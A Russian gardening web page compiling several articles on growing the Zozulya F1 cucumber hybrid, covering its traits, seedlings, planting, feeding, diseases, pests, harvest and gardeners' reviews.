4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Огурцы сорта зозуля как выращивать и собрать хороший урожай

Огурцы Зозуля – проверенный временем высокоурожайный гибрид

Огурцы – овощи, которые употребляются в пищу недозрелыми. Особенность плодов в большом количестве влаги и питательных элементах. Огурцы благотворно влияют на пищеварение, отличные помощники коже в виде масок. За счет того, что растения тепло- и влаголюбивые, огородникам приходится соблюдать особые условия для выращивания. Поэтому и был выделен с множества сортов сорт огурцов Зозуля. Об особенностях и способах разведения читайте далее.

Характеристика и описание сорта огурца Зозуля

Зозуля – пчелоопыляемый гибрид, правда, с частичной партенокарпией. Ранние сроки созревания. Уже через полтора месяца после посадки можно убирать первый урожай. Вначале это до 10 кг с метра квадратного площади, потом постепенно увеличивается до 18 –20 кг. Длинные огурцы сорта Зозуля в среднем 15–20 см, масса до 300 грамм. Данный сорт относят к морозоустойчивым. Подобные ему семена огурцов сибирской селекции описаны тут.

Форма характерная для тепличных сортов – цилиндрическая, удлиненная. Может быть с небольшим изгибом. Бороздки и бугорки на плодах слабовыраженные. Цвет кожицы насыщенно-зелёный с едва заметными белесыми полосами. Мякоть плотная, с мелкими, почти незаметными семенами. Кусты обладают ограниченным боковым ветвлением, поэтому не всегда необходимо пасынкование огурцов.

Рекомендуется к выращиванию на балконах, подоконниках (пригоден для выращивания в комнатной культуре).

Особенности сорта

Сейчас много разнообразных сортов огурцов как чистых, так и гибридов предлагает рынок овощеводам. У каждого как свои достоинства, так и недостатки. Нет идеальных сортов, которые бы отвечали всем требованиям, которые выдвигают к ним как садоводы-любители, так и большие фермерские хозяйства. Но как в каждой среде есть свои любимчики, так и среди овощеводов большой популярностью пользуется гибрид Зозуля. Про сорта и гибриды томатов читайте здесь.

И хотя с момента выведения прошло уже около тридцати лет, но большинство любителей покопаться в земле отдают предпочтение именно ему, когда идёт разговор о посадках зеленцов в теплицах.

Страна выведения, регионы выращивания

Огурец – выходец из субтропических лесов. Выращивают его обычно для приготовления салатов. Те сорта, которые предназначены для посадки в открытый грунт, представлены короткоплетистыми и кустовыми формами. Тепличные же образуют длинный стебель, а плоды цилиндрические. Огурец Зозуля даёт хороший урожай именно в закрытом грунте.

Гибрид выведен отечественными селекционерами в УНЦ им. В. И . Эдельштейна (Москва) в конце XX столетия. Специально для обстоятельных огородников, которые имеют плёночные, стеклянные, поликарбонатные теплицы. А также возможность регулярного орошения посадок. Поэтому именно этот сорт пригоден для выращивания во всех регионах страны.

Тем более, что гибрид скороспелый. В первый же месяц плодоношения можно получить высокий урожай зеленца. Поэтому есть возможность не только обеспечить свою семью сочными и хрустящими овощами, но и занять достойную нишу на рынке по продаже ранних овощей. В южных регионах может выращиваться в открытом грунте.

Достоинства и недостатки

Очень часто овощеводы для посадок в теплицах выбирают именно гибрид отечественной селекции Зозулю. И всё потому, что у сорта с цилиндрическими зеленцами больше достоинств:

  • нежный вкус овощей;
  • частичная партенокарпия. То есть могут самоопыляться;
  • при перерастании плоды не желтеют;
  • хорошая урожайность. С одного квадратного метра площади при правильной агротехнике дают до 20 кг. В среднем до 12 кг;
  • быстрый результат. Через полтора месяца после высадки можно получить уже первый урожай;
  • в плодах нет горечи. Впрочем, как и в большинства сортов, если вовремя поливать посадки;
  • устойчивость к некоторым заболеваниям: оливковой пятнистости, вирусу огуречной мозаики, корневой гнили;
  • хорошая лежкость. Длительный период сохраняют товарный вид;
  • отсутствует необходимость проведения пасынкования.

Среди недостатков – подходит только для употребления в свежем виде и почти непригоден к засолке. Про сорта огурцов для засолки читайте в данном материале.

Чтобы получить хороший урожай огурцов гибрида Зозуля их лучше выращивать в закрытом грунте.

Выращивание

Сортов и гибридов очень много. Но предпочтение отдаётся тем, которые раньше начинают плодоносить, имеют дружную отдачу. И хотя бы относительно устойчивые к заболеваниям. К таким относится гибрид Зозуля.

Специфика высокопродуктивных гибридов состоит в том, что с их семян на второй год посадки нельзя получить высокий урожай. Поэтому не стоит заготавливать посадочный материал впрок.

Чтобы зеленцы порадовали своей скороспелостью и урожайностью необходимо правильно подготовить почву к посеву и определить предшественников.

  1. Горох.
  2. Кукуруза.
  3. Бобовые.

Допустимые предшественники – картофель, томат.

Подготовка грунта

Культура очень требовательна к плодородию грунта. Поэтому перед весенней перекопкой вносят удобрения. Они могут быть как органические (до 100 кг навоза на 10 метров квадратных), так и минеральные:

  • 250 г калийной соли;
  • 200 г аммиачной селитры;
  • 400 г суперфосфата;

Внесения минеральных удобрений осенью недостаточно для зеленца. Нужно ещё внести перед посадкой в лунки немного перегноя и 150 грамм золы.

Грядки перекапывают осенью после внесения удобрений, а весной боронуют. Если глинистые или суглинистые почвы заплыли, то весной надо опять её рыхлить.

Подготовка семян и выращивание рассады

Семенной материал прогревают и замачивают в слабом растворе марганцовки на 15 минут. Промывают в воде, размещают между слоями влажной марли. Поддерживают температуру не менее 20 градусов. Как только семена проклюнутся, их высевают в горшки. Температуру поддерживают ту же. Высокий урожай можно получить с 20-дневной рассады.

Выращивание на шпалере

Гибрид Зозуля выращивают на шпалере. Позитивные моменты этого процесса:

  • тепличные огурцы нуждаются в этом. Так как, например, данный сорт почти не ветвится, а имеет один центральный стебель;
  • рационально используется земельный участок;
  • посадки лучше прогреваются и продуваются ветром;
  • листья не соприкасаются с землёй, и на них не остаются капли после полива. То есть снижается риск заражения грибковыми заболеваниями.

Поэтому на любые опоры, которые размещают в начале, центре и окончании рядка натягивают шпагат или проволоку. Растения подвязывают к нижнему ряду, а потом оно само цепляется усиками и поднимается.

Сейчас в продаже есть специальная огуречная сетка, которую просто нужно закрепить между опорами и растения сами, закрепляясь на ней усиками, поднимаются вверх.

В открытом грунте

Гибрид Зозуля – это тепличное растение, но в южных регионах можно выращивать в открытом грунте, как через посадку рассады, так и высевом семян сразу на грядки. Некоторые овощи нужно специально затенять, при этом огурцы сорта «Зозуля» страдать от недостатка света не будут. Культура выносит незначительное затенение. Поэтому размещают и под деревьями или даже возле кукурузы, которая может послужить растению в дальнейшем опорой. Схема посадки томатов в открытый грунт читайте по ссылке.

Посев

Лучшая схема посева 10 х 70 см. То есть интервал между семенами до 10 см, а междурядья -70 см.

Огурец очень плохо переносит низкие температуры, поэтому сев начинают, когда температура почвы будет не менее 15 градусов на глубине заделки. Высевают в три или четыре срока с интервалами от пяти до семи дней. Обычно глубина бороздок под посадку до 4 см.

После того как появятся первые всходы необходимо провести рыхление, а когда появится первый настоящий лист то и прорывку. Если это ряд, то расстояние между ростками должно быть 15 см, а в лунках оставлять по 3 растения. В это время проводят первую подкормку коровяком, аммиачной селитрой.

Хлористый калий лучше не использовать для подкормок.

Вторая подкормка через две недели после первой. Третью осуществляют перед смыканием плетей.

Поливают по бороздкам через 3 дня по 400 литров воды на 10 метров квадратных площади.

В теплицах

Тепличные огурцы выращивают в обогреваемых теплицах при 21 –25 градусах.

Рассаду можно высаживать прямо в почву, освобождая из ёмкостей, в которых она была выращена. Перед посадкой субстрат следует увлажнить. Если рассада росла в торфяных стаканах, то её так и высаживают. Зозуля в теплице очень быстро растёт, поэтому нужны регулярные поливы и подкормка жидкими удобрениями. Но переувлажнять почву тоже нельзя.

Растения подвязывают, а когда оно дотянется до кровли крыши, верхушку прищипывают. Ускорить плодоношение поможет прищипывание боковых побегов на два листа. Растение самостоятельно регулирует количество плодов, поэтому не стоит огорчаться, когда некоторые цветы начинают осыпаться. Таким образом, правила агротехники довольно просты:

  • обязательное подвязывание кустов к шпалере и прищипывания верхушек;

  • постоянное орошение, но не переувлажнение почвы;
  • подкормки удобрениями не менее 3 раз за сезон;
  • рыхление и уничтожение сорняков;
  • борьба с вредителями и болезнями.

Урожайность

Гибрид Зозуля при правильной агротехнике в обогреваемой теплице может дать в среднем 12 кг, а максимально до 20 кг с метра квадратного полезной площади. Даже в начале плодоношения этот сорт порадует урожайностью до 10 кг плодов на метр квадратный. Нельзя чтобы плоды перерастали, поэтому снимать урожай желательно ежедневно, острым ножом обрезая плодоножку.

Урожай лучше собирать чаще, тогда урожайность будет выше. Это нужно делать раз в день.

Болезни и вредители

Тёплая и влажная среда – прекрасные условия, в которых появляются вредители и болезни огурцов.

К вредителям относят:

  • Белокрылка. Результат её работы – появление сажистого грибка, распространение которого приводит к гибели растений.
  • Тля. На нижней пластике листа можно увидеть целые колонии сокососущих насекомых. Они не только сами поражают растения, но и являются переносчиками вирусных заболеваний, их возбудителей. Огуречные плети чахнут и урожайность резко падает.

  • Мучнистая роса. Появлению способствует подсушенность корневой системы. На листьях образуется белый налёт.
  • Белая гниль. Распознают заболевание по белым пятнам на плодах и листьях. Грибковое заболевание. Чтобы оно не распространялось, перед обработкой химическими средствами удаляют все зараженные участки.
  • Серая гниль. Пятна дымчато-коричневого цвета, которые появляются на листьях и плодах. Обрабатывают растения соответствующими фунгицидами.
  • Аскохитоз (черная стеблевая гниль). Появление вначале зеленых, а позже — бурых, белых пятен. Плоды начинают гнить.
  • Пероноспороз. Или ложная мучнистая роса. Появляются светло-желтые пятна, которые очень быстро увеличиваются в размере. Обработать Топазом или Оксихомом.
  • Антракноз огурцов. О заражении огурцов можно догадаться, если на листьях и стеблях начали появляться бурые, желтые пятна. Ткань растения может разрываться, и образуются щелевидные отверстия. Как только на листовых пластинах появляются пятна, нужно немедленно их обрабатывать фунгицидами, инсектицидами.

Хороших результатов в борьбе против грибковых заболеваний можно достичь, обрабатывая растения раствором молочной сыворотки, кефира. Нужно литр одного из этих продуктов растворить в ведре воды и обрызгать кусты.

Видео

Выводы

Зозуля – гибрид, созданный отечественными учеными почти три десятилетия тому назад, но пользующийся популярностью среди овощеводов благодаря нежному вкусу, большой урожайности, противостоянию некоторым заболеваниям: оливковой пятнистости, вирусу огуречной мозаики, корневой гнили. С одного метра квадратного площади этот сорт при правильной агротехнике может дать до 20 кг плодов. Больше подходит для выращивания в теплицах. Благодаря строению центрального стебля почти не нуждается в пасынковании. Но есть необходимость подвязывания на шпалеру. Можно в южных регионах выращивать в открытом грунте, но урожайность будет в таких условиях гораздо меньше.

Про семена лучших сортов огурцов читайте в этой статье.

Сорт огурцов Зозуля

Сорт огурцов Зозуля известен огородникам уже многие годы. Получен на Овощной опытной станции имени В. И. Эдельштейна. Он был внесен в Госреестр России в 1977 году. Его любят за универсальность, неприхотливость, высокое качество зеленцов. Огурец Зозуля пригоден для выращивания в разных регионах России, и странах с подобными климатическими условиями. В этой статье представлено подробное описание гибрида.

Описание сорта Зозуля

Огурец Зозуля относится к скороспелым видам. От появления всходов и до созревания урожая проходит в среднем 40-45 дней. Относится к партенокарпическим гибридам, для выращивания под укрытиями, хотя и в открытом грунте может давать неплохой урожай.

Огурчики растут удлиненно-цилиндрической формы, иногда имеется небольшой изгиб. Длиной зеленцы по 14-24 см и весом в пределах 150-280 г. Шкурка плотная, но съедаемая, не горчит. Окрас огурчиков темно-зеленый, насыщенный, с тонкими полосами светлого оттенка. Бугорчики на шкурке небольшие и их не много. Шипы былого цвета. Мякоть плотная, с высоким содержанием сока. Вкус приятный.

Мякоть плотная, с высоким содержанием сока, вкус приятный

Характеристика огурцов Зозуля F1

Огурец Зозуля славится своими положительными качествами, так что не удивительно, что его часто выбирают огородники для выращивания.

  • Сорт не требует опыления, поэтому его просто выращивать в теплицах, парниках (под укрытием).
  • Есть иммунитет к пятнистостям и вирусу огуречной мозаики.
  • Растения сильные, хорошо растут даже при неблагоприятных условиях.
  • Назначение преимущественно салатное, но и в консервации эти огурчики на вкус хорошие.

Назначение преимущественно салатное, но и в консервации эти огурчики на вкус хорошие

Недостатки гибрида

Главный недостаток этого гибрида в том, что при выращивании в открытом грунте у сорта снижается урожайность. В среднем с квадрата посадок в незащищенной земле, можно собрать 10 кг огурчиков.

Нужно также учитывать, что зеленцы могут расти неправильной формы, искривляться, принимать форму лампочки. В особенности это наблюдается в жаркое лето, когда температура на улице или в теплице слишком высокая.

Горечь появляется лишь в случае, когда нарушен режим полива. Огурцы, которым недостает воды, всегда горчат. Так что если просто вовремя поливать кустики и следить, чтобы земля не пересыхала, проблем со вкусом не будет.

Рассада огурцов Зозуля

Выращивать огурцы Зозуля F1 проще всего рассадным методом. Рассада заготавливается заранее. В промежутке между 20 апреля и 1 мая сеют семена. Грунт для посева делается из 5 частей торфа, 3 частей перегноя и 2 частей дерна. После смешивания в ящике для рассады, посадочный грунт нужно обработать слабым раствором марганцовки.

Семена необходимо заранее замочить на 30-60 минут в чистой, простой воде. Все, что всплывут – убирают, так как они пустые. После этого, можно семена сеять в лунки или в борозды, сделанные карандашом. Сеют их на расстоянии 5-6 см друг от друга, чтобы могли свободно развиваться.

Выращивать огурцы Зозуля F1 проще всего рассадным методом

Первые ростки появляются при температуре +25…+28 градусов, но после появления ростков, ее понижают до +21 градуса, чтобы ростки не вытягивались. Ухаживают за рассадой постоянно. Нужно время от времени проводить поливы, подкормки слабыми растворами удобрений и рыхление почвы. Когда у саженцев появится 3-4 листика (через 3 недели после посева в среднем), можно будет пересаживать их на постоянное место.

Особенности посадки Зозули

Чтобы огурчики хорошо уродили, необходимо сажать их в хороший грунт. Участок подбирается солнечный, равнинный, чтобы свет равномерно распределялся по рядкам. Лучшие предшественники – лук, чеснок, картофель или сидераты. Земля должна быть легкой, плодородной, с нейтральной кислотностью.

Время посадки зависит от климата, места, где будут выращиваться огурчики. Чаще всего это делают в мае. Но желательно делать это после того, как грунт прогреется до +20 градусов.

Чтобы огурчики хорошо уродили, необходимо сажать их в хороший грунт

Рассаду пересаживают в хорошо удобренный, рыхлый грунт. В нем необходимо сделать лунки на расстоянии 35-50 см друг от друга, глубиной около 15 см. Чтобы ростки быстрее прижились, можно в каждую ямку добавить по горсточке перегноя, 0,5 ч. л. суперфосфата и столько же калийной соли, а затем обильно полить. Когда вода впитается, можно будет провести и саму посадку. Саженцы аккуратно вынимаются их старого контейнера и опускаются в лунки. Присыпают их землей аккуратно, чтобы не заглублялась точка роста.

Если рассада слабая, в каждую лунку сажается сразу по 3 ростка. Когда они подрастут, можно будет выбрать самый сильный, а остальные рассадить или просто удалить.

Правила ухода за огурцами Зозуля F1

После проведения посадки, необходимо обеспечить саженцам полноценный уход. Делать это не трудно, так как сорт неприхотлив.

    Полив нужно проводить регулярно, чтобы земля не пересыхала. Если воды огурцам будет мало, появится горечь в шкурке и в мякоти! На молодое растение за раз должно расходоваться не меньше 500 мл воды, а на взрослое – 1 литр. Вода нужна теплая, в идеале – дождевая.

Полив нужно проводить регулярно, чтобы земля не пересыхала

  • Рыхление грунта необходимо после каждого полива. Если земля возьмется коркой, к корням перестанет поступать кислород в достаточном количестве, и развитие замедлится.
  • Благодаря ограниченному боковому ветвлению, огурцы Зозуля, как правило, не прищипывают.
  • Сорняки, что появляются в междурядьях и под кустиками огурчиков, нужно постоянно вырывать. Это станет хорошей профилактикой болезней, вредителей и, кроме того, во время этой процедуры вспушивается грунт, так что потребуется меньше прополок!
  • Растения хорошо отзываются на внесение удобрений. Использовать для этого можно органику, минералы или органо-минеральные (ОМУ) препараты. Вносят удобрения под корень или распыляют по листу (в зависимости от вида). Первая подкормка нужна во время появления 1 листика (настой куриного помета, нитрофоска). Второй раз удобрения вносят после появления 2 листика (сульфат калия, куриный помет). Третий раз подкормка делается такой же, как во 2 раз, через 2-3 недели. Ну и в начале цветения также стоит использовать удобрения (аммиачная селитра или мочевина).

Зозуля F1 хорошо отзываются на внесение удобрений

Плодоносить огурцы Зозуля могут и без опыления. Но урожайность при этом будет на среднем уровне. Если же дополнительно опылить растения вручную или запустить в теплицу пчел, завязей будет намного больше.

Болезни и вредители огурцов

Огурец Зозуля устойчив к большинству заболеваний, но полностью нельзя избежать недугов.

  • Аскохитоз проявляется в водянистых пятнах с точками черного цвета на черешках листьев и стеблях. Как следствие стебель сохнет, на листьях появляются бурые пятна с черными точками. Чтобы не допустить болезнь, теплицу нужно регулярно проветривать. Если же недуг замечен на растении, его сразу вырывают и сжигают.
  • Антракноз проявляется в бурых пятнах на листочках и бурыми вмятинами на стебле. Плоды начинают быстро гнить, отдают горечью. Профилактика та же, что и в предыдущем случае. Если болезнь появилась, все больные растения удаляют с участка.
  • Бактериоз проявляется в коричневых пятнышках на листочках, со временем на их месте появляются дырочки. Плоды растут кривыми, водянистыми, с язвами. Для лечения и профилактики используется бордосская жидкость по инструкции. Также важно своевременно проветривать теплицу, поддерживать там нормальную влажность, температуру.

Вредители поражают этот гибрид не часто. Но даже если такое случается, при своевременном лечении большого вреда они растению не причинят. Чаще всего на пагонах селится тля. Ее легко заметить, если присмотреться к верхушкам молодых побегов и тыльной стороне молодых листиков. Чтобы вывести вредителя, можно использовать инсектициды «Арриво», «Танрек», «Фитоверм», «Актофит», «Актара».

Сбор и обработка урожая

Огурцы созревают постепенно. Собирать их лучше всего каждые 3-5 дней, чтобы долго на плетях не висели. К тому же своевременная уборка урожая провоцирует завязывание новых плодов. Первые зеленцы созревают уже в июне или начале июля, при своевременной посадке.

Огурцы Зозуля F1 чаще всего применяют для приготовления салатов и свежих закусок

Употребляют зеленцы в свежем виде. Их можно применять для приготовления салатов, свежих закусок. А можно ли солить или консервировать огурцы Зозуля? Как правило, подобного рода огурчики для засолки не используют. Но многие хозяйки отмечают, что и огурец Зозуля подходит для консервирования. Если зеленцы заранее вымочить в воде и выбрать хороший рецепт маринада, они получатся вкусными и хрустящими.

Отзывы огородников о сорте огурцов Зозуля

Мнения огородников, что уже пробовали выращивать огурцы Зозуля на своих участках, представлены ниже.

  • Антонина Душа: «Слышала много лестных отзывов об огурцах Зозуля, поэтому решила посадить на своем участке. Сажала в открытый грунт, за домом, где много солнышка. Огурчики выросли нормального размера, но некоторые горчили. Скорее всего, им было очень жарко, так как лето знойное выдалось. В принципе сорт неплохой, но я больше сажать не буду, так как жара летом в моем регионе не редкость!».
  • Сергей Метелкин: «Люблю огурец Зозуля за приятный вкус и высокую урожайность. Выращиваю только в теплице, потому что в открытом грунте они дают меньше плодов. В принципе с ростом у них проблем нет, завязей всегда много, нужно только следить за тем, чтобы температура была умеренной (не жара) и чтобы грунт не пересыхал. Если обеспечить огурчикам этого сорта хороший уход и нормальные условия для развития, они дадут столько урожая, что и на еду и на консервацию хватит!».
  • София Селедочкина: «Уже по одному виду огурцов Зозуля, можно понять, что они для салатов. И все же в прошлом году я их попробовала законсервировать, потому что не было никаких других – плохо уродили засолочные сорта. Как не удивительно, в баночках эти огурчики получаются неплохими. Конечно, не хрустят, как положено засолочным, и не так хорошо впитывают пряный маринад, но тоже неплохо – для разнообразия. А вот солить их крайне не рекомендую. Вкус у них получается пресный, а мякоть размягчается».

Как правильно высаживать и ухаживать за огурцами сорта Зозуля

Среди всех выращиваемых на приусадебных участках овощей наибольшей популярностью пользуются огурцы, которые можно употреблять в пищу в свежем или же консервированном виде. Сегодня популярность получили многочисленные сорта этого овоща, которые различаются своими размерами, вкусовыми характеристиками и предназначением.

Большой популярностью сегодня пользуется сорт Зозуля, который имеет превосходные вкусовые качества, отличается простотой выращивания и устойчив к различным болезням. Огурцы Зозуля ф1, описание которых вы найдете на этой странице, позволят каждому садоводу получить отличный урожай.

Характеристики сорта Зозуля

Зозуля — это раннеспелый гибрид, который имеет тонкую хрустящую кожицу. Выведен этот сорт научно-исследовательским институтом сельского хозяйства в 1977 году и быстро получил популярность у садоводов. Огурцы Зозуля, характеристика которая делает их одними из лучших раннеспелых разновидностей, пользуются популярностью у дачников. Такой скороспелый сорт, который позволяет получать первый урожай уже на 45 день после появления всходов.

Крупноплодная разновидность, которая может достигать веса в 300 грамм и длинны в 20 сантиметров. Созревший огурец Зозуля имеет характерную цилиндрическую форму и слабовыраженную бугорчатость. Окраска тёмно-зелёного цвета с едва заметными светлыми полосами. Шипы светлые и малочисленные. Необходимо отметить частично самоопыляемые, что позволяет избавить садовода от необходимости высаживания в непосредственной близости сортов-опылителей.

Выращенный урожай обладает мягким выраженным слегка сладковатым вкусом. При правильном уходе огурец Зозуля будет полностью лишен характерной горечи. Огурец Зозуля — это универсальный сорт, который одновременно отлично подходит для употребления в пищу в свежем виде или же для последующей засолки и консервации. Созревшие овощи отличаются великолепной лежкостью, что позволяет долгое время хранить собранный урожай.

При обеспечении соответствующих условий с квадратного метра грядки за один месяц можно получить до 12 килограмм урожая, а в последующем до 20 килограмм вкусных огурчиков. Этот сорт отличается устойчивостью к оливковой пятнистости, загниванию корешков и огуречной мозаике. Отметим, что с одинаковым успехом Зозулю можно выращивать в открытом грунте, под плёнкой, на балконе или подоконнике. При выращивании в тёплой обогреваемой теплицы урожай можно получать круглый год.

Огурец Зозуля — правила выращивания

В первую очередь садоводу необходимо определиться с грядкой, где в последующем будут высажены саженцы. Наилучшими предшественниками считается картофель, перец, лук и капуста. Непосредственно подготовка грядок не представляет сложности. Предпочтительно выбирать хорошо освещённый участок для грядки, который хорошо защищен от сильного ветра. Необходимо внести небольшое количество перегноя, а добавление комплексных минеральных удобрений с калием и азотом улучшает показатели плодоношения. Такая подготовка грядок выполняется не позднее чем за две недели до предполагаемой даты высадки саженцев в грунт.

От качества используемого материала непосредственно зависит урожайность и простота ухода за посадками. Используемые семена необходимо откалибровать и в последующем непосредственно перед посадкой замочить в нитроаммофоске или же приготовленном самостоятельно питательном составе. Для приготовления такого питательного состава необходимо в одном литре теплой воды растворить одну столовую ложку древесной золы.

Выращивание рассады может осуществлять двумя способами:

  • Проращивание семян в марле.
  • Выращивание сеянцев в опилках.

Проращивание огурцов сорта Зозуля в марле получило широкое распространение, что объясняется простотой и эффективностью данного способа. Вам потребуется небольшая емкость, в которую выкладывают свернутую в несколько слоев смоченную в воде марлю. Далее на растоянии в 1-2 сантиметра раскладывают семена огурцов и сверху накрывают несколькими слоями влажной марли.

Если выбран способ с использованием опилок, то сухой материал следует обдать кипятком, после чего остудить до комнатной температуры. Небольшую ёмкость выкладывают водопроницаемой тканью и сверху на нее раскладывают сухие семена. Ткань и семена сверху засыпают небольшим слоем опилок, после чего слегка смачиваются водой. После развертывания семядолей пророщенные семена следует аккуратно высадить в горшок.

При выращивании саженцев необходимо соблюдать температурный режим и регулярно поливать молодые растения. Посадкам потребуются следующие температур:

  • Непосредственно до появления первых листочков оптимальная температура 28 градусов.
  • После прорастания температуру нужно держать на уровне 20-22 градуса.
  • Саженцы, у которых появилось уже несколько полноценных листиков, держат при температурах не выше 20 градусов.

В пасмурные дни рекомендуется дополнительно подсвечивать растения, для чего можно использовать фитолампы с красным спектром освещения.

За неделю до предполагаемой даты посадки саженцев в открытый грунт следует провести процедуру закаливания. Для этого в солнечную безветренную погоду горшочки с саженцами выносятся на балкон на 15-20 минут.

Важно. Помните о том, что молодая рассада сорта Зозуля плохо переносит перепады температур и сквозняки.

Возможна также посадка огурцов сорта Зозуля непосредственно семенами в открытый грунт или теплицу. В данном случае необходимо соблюдать следующие правила:

  • На квадратный метр грядки высаживают не больше 3 саженцев.
  • Посадка возможна лишь в конце мая, когда уже нет угрозы заморозков.
  • Почва должна прогреться минимум до 15 градусов.

Важно. Высаживать огурец Зозуля в открытый грунт можно в южных регионах, где уже в мае месяце не отмечаются заморозки, а температуры ночью не опускаются ниже 10 градусов.

Лучшими почвами для высаживания огурцов этого сорта являются заправленными органическими удобрениями среднесуглинистые почвы с хорошей воздухопроницаемостью.

Как правильно высадить рассаду на грядке

Предлагаем вам достаточно простые правила посадки рассады огурцов этого сорта:

  • Рассаду высаживают на 25 день после появления всходов. Как правило, у сеянцев появляется к этому времени четыре полноценных листика.
  • Корневая система должна хорошо оплетать земляной ком.
  • Высаживают саженцы в лунки с диаметром около 40 сантиметров.
  • Рассаду следует высаживать вместе с комом земли, не повреждая корни.
  • В одну лунку можно высадить до трёх растений, в последующем выполнив прореживание.
  • После посадки саженцы обильно поливают.
  • Почва обязательно мульчируется.
  • Землю следует укрыть пленкой или другим теплозащитным материалом.

Уход за посадками и сбор урожая

Обеспечение посадкам правильного ухода станет гарантией получения отличного урожая. Садоводам необходимо будет выполнять правильный полив растений, проводить регулярное удаление сорняков и правильно подкармливать овощи.

За период вегетации необходимо будет выполнить не менее трёх подкормок. До начала цветения рассады следует внести удобрения с минеральной основой, которые содержат азот и калий. После цветения в период образования завязей можно использовать для подкормки растений смесь из навоза и мочевины. Для приготовления такой смеси на ведро воды добавляют 100 грамм мочевины и литр навоза. Также в период активного плодоношения можно использовать уже готовые комплексные удобрения под названием Аэлита овощная.

Полив посадок выполняется исключительно тёплой отстоянный водой. Строго запрещается использовать для этих целей холодную воду из скважины, что незамедлительно приведет к различным болезням у посадок и существенному ухудшению урожайности. Полив выполняется рано утром или вечером, когда уже сойдёт дневная жара.

В процессе роста у взрослых растений может наблюдаться так называемое оголение корней. Решить данную проблему можно путем окучивания кустиков. Одновременно с таким окучиванием следует удалить все сорняки, которые могут способствовать развитию различных заболеваний у овощной культуры.

Для улучшения урожайности и в качестве профилактики различных заболеваний следует исключить контакт плетей и созревающего урожая с землёй. Для этих целей можно использовать укрывочный материал или обычную черную полиэтиленовую плёнку.

Не забывайте также о необходимости подвязывания плетей огурцов, что позволит обеспечить упрощение сбора урожая, а овощ будет отлично плодоносить, позволяя получать хороший урожай. Подвязывать плети следует, как только они достигнут 50 сантиметров длины. Их можно пускать по веревкам, которые натягиваются по горизонтали к установленной вертикальной опоре. Правильная подвязка позволит вам не только получить отличный урожай, но и гарантирует максимальную эффективность использования имеющейся площади грядок.

Огурец Зозуля по своему описанию относится к самоопыляемым, поэтому дополнительные опылители ему не потребуются. Однако опытные садоводы рекомендуют всё же на один ряд высаживать несколько мужских растений, что позволит обеспечить улучшение показателей урожайности. Также для перекрестного опыления можно высаживать различные иные сорта гибридов огурцов.

Этот сорт овоща любим начинающими садоводами за простоту ухода. Работы по пасынкованию и прищипыванию возможна, но при этом она необязательна. Прищипка – это удаление части образующихся зелёных завязей, что укрепляет оставшиеся завязи, обеспечивая их быстрое созревание и улучшение урожайности. Пасынкование подразумевает собой информирование одного мощного основного стебля и удаление боковых отростков. У сорта Зозуля пасынкование можно провести следующим образом. До шестого листа убирают все боковые отростки, после чего оставляют завязь с одним пасынком и далее основам удаляют появляющиеся отростки.

Внимание. Огурец Зозуля не переносит недостатка влаги и высоких температур. Именно поэтому садоводу следует регулярно поливать посадки, а при выращивании в теплицах необходимо будет обеспечить качественное проветривание парника.

Огурец Зозуля отличается великолепной урожайностью, поэтому снимать урожай можно буквально ежедневно. Отметим, что такой частый сбор созревших плодов позволяет улучшить показатели урожайности.

Заключение

Огурец Зозуля благодаря своей урожайности, отличным вкусовым характеристика и легкости выращивания пользуются любовью у садоводов. Можем порекомендовать их как опытным дачникам, так и начинающим садоводам, которые даже при таком минимальном уходе смогут получить великолепный урожай вкусных хрустящих огурчиков. Предлагаемое нами в этой статье описание этого овоща позволит каждому с легкостью получить отличный урожай.

Популярнейшие среди огородников огурцы «Зозуля» для теплиц и открытого грунта

Редкий огородник не желает поскорее получить урожай огурцов. Гибрид Зозуля f1 предоставит такую возможность. В статье рассмотрим подробное описание гибрида, инструкцию по его выращиванию, основные преимущества и недостатки. Также поделимся с вами популярными отзывами фермеров об огурцах.

Характеристика и описание огурцов Зозуля

Садоводы часто используют парники и теплицы для ускорения созревания урожая. Для таких способов выращивания выводят различные гибриды и сорта огурцов, Зозуля — не исключение.

Отличительные черты

Гибрид был выведен российскими селекционерами. Он встречается в большинстве регионов России. Культивируют его в открытом и закрытом грунте, но больше урожая гибрид дает при пленочном выращивании.

Зозуля созревает рано. Длина плода — от 15 см, масса — до 300 г. Форма огурцов цилиндрическая, цвет насыщенно-зеленый. Семена внутри плода мелкие и мягкие.

Состав, свойства, польза, калорийность

У огурцов Зозуля белые шипы, тонкая кожица. Мякоть сочная, ароматная, плотной консистенции. Вкус огурца сладковатый.

Отличительная черта — плоды не горчат и долго держат товарный вид. Огурец содержит 14 ккал, 0,8 г белков, 0,1 г жиров, 2,5 г углеводов. Плоды полезны для организма: повышают аппетит и обладают желчегонным, мочегонным действием.

Характеристики кустов, урожайность

Кусты гибрида слабоплетистые. Они не образуют пасынков, что упрощает уход. Цветки партенокарпические, не требуют опыления насекомыми. Растения сильнорослые, неприхотливые, переносят перепады температур и устойчивы к болезням.

Вкус у плодов нежный, ароматный и сочный, кожица негорькая. Урожайность — 15 кг на 1 м², в первый месяц — около 10 кг.

Как вырастить самостоятельно

Для выращивания этого гибрида в теплице следует выбрать ровный солнечный участок, который будет защищен от ветра. Почва должна быть легкой, плодородной.

Если грунт плохого качества, заполните теплицу смесью из торфяной земли и перегноя. До посадки производят обеззараживание грунта. Для этого растворяют 3 г марганцовки в 10 л горячей воды и обильно поливают землю.

Другие сорта огурцов:

Посадка семенным и рассадным способом

Семенной метод используют редко, только если есть пленочное укрытие. Семена перед посевом заливают водой на час. Экземпляры, которые всплыли — непригодны, их выбрасывают. Опустившиеся же на дно ополаскивают, заворачивают во влажную тряпочку и помещают в теплое место на несколько дней.

Как только появились ростки, приступают к посевам. В рядах делают лунки через каждые 30 см. На дно каждой выкопанной лунки высыпают часть перегноя и удобрений, после чего заливают 0,5 л воды. После впитывания влаги опускают в лунки по три семени и присыпают сухой землей. Посев начинают после того, как воздух прогреется до +20 °С.

Справка. Проросшие растения прореживают, оставляя в лунке только сильные посевы.

При таком выращивании важное условие — чтобы каждое семечко взошло и превратилось в полноценное растение.

Этапы выращивания рассады:
  1. Прогревание. Даже лучшие семена могут не взойти. Чтобы этого избежать, делают прогревание. За несколько месяцев до посева огурцы в пакетах кладут к отопительным приборам, температура которых — около +30 °С. Если она выше, то можно уменьшить продолжительность процедуры на пару дней. Это позволит повысить вероятность появления хороших всходов и увеличить количество цветков на кустах.
